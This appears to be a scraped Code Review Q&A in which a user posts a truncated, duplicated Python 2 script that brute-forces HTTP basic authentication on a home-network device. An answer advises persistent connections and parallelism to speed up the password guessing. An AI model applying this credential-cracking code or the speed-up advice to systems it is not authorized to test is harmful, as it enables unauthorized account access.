patternpythonMinor
Brute force HTTP with Python
Viewed 0 times
forcewithhttppythonbrute
Problem
I am playing around with brute force attack on my home network. I wrote the following script with Python. However progress is a little slow. Does anyone have a suggestion how to make this faster?
```
import socket
import urllib2, base64
import sys
import time
def afunction(password_start):
#-------------------------------------------------------------------------- ONLY ONCE
charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
request = urllib2.Request("http://192.168.178.25/parse.html")
num = len(charset)**3
print "Trying to crack parse.html...\n"
# STATUS VARIABLES
totspeed = 0
c= 0
total = 36**6
#GET THE INDEXES TO START WHERE THEY SHOULD
first_time = True
ilist = []
for i in password_start:
for index, j in enumerate(charset):
if i == j:
ilist.append(index)
#USERNAME
usrname = 'admin'
#-------------------------------------------------------------------------- LOOP
for idx, l in enumerate(charset):
_q = idx
if idx < ilist[0] and first_time:
continue
for idx2, m in enumerate(charset):
_w = idx2
if idx2 < ilist[1] and first_time:
continue
for idx3, n in enumerate(charset):
_e = idx3
if idx3 < ilist[2] and first_time:
continue
at = time.time()
for idx4,o in enumerate(charset):
if idx4 < ilist[3] and first_time:
continue
for idx5, p in enumerate(charset):
if idx5 < ilist[4] and first_time:
continue
for idx6, q in enumerate(charset):
if idx6 < ilist[5] and first_time:
continue
#PASSWORD
passwd = l+m+n+o+p+q
first_ti
```
import socket
import urllib2, base64
import sys
import time
def afunction(password_start):
#-------------------------------------------------------------------------- ONLY ONCE
charset = 'abcdefghijklmnopqrstuvwxyz0123456789'
request = urllib2.Request("http://192.168.178.25/parse.html")
num = len(charset)**3
print "Trying to crack parse.html...\n"
# STATUS VARIABLES
totspeed = 0
c= 0
total = 36**6
#GET THE INDEXES TO START WHERE THEY SHOULD
first_time = True
ilist = []
for i in password_start:
for index, j in enumerate(charset):
if i == j:
ilist.append(index)
#USERNAME
usrname = 'admin'
#-------------------------------------------------------------------------- LOOP
for idx, l in enumerate(charset):
_q = idx
if idx < ilist[0] and first_time:
continue
for idx2, m in enumerate(charset):
_w = idx2
if idx2 < ilist[1] and first_time:
continue
for idx3, n in enumerate(charset):
_e = idx3
if idx3 < ilist[2] and first_time:
continue
at = time.time()
for idx4,o in enumerate(charset):
if idx4 < ilist[3] and first_time:
continue
for idx5, p in enumerate(charset):
if idx5 < ilist[4] and first_time:
continue
for idx6, q in enumerate(charset):
if idx6 < ilist[5] and first_time:
continue
#PASSWORD
passwd = l+m+n+o+p+q
first_ti
Solution
- move the code that generates passwords and makes connections, retry logic to separate functions
- make multiple requests using the same tcp connection (urllib doesn't support persistent connections, you could use httplib directly instead)
- make multiple connections in parallel (using threads/processes and/or some async library e.g.,
requests.async
Here's the code: Brute force basic http authorization using httplib and multiprocessing.
Context
StackExchange Code Review Q#12659, answer score: 4
Revisions (0)
No revisions yet.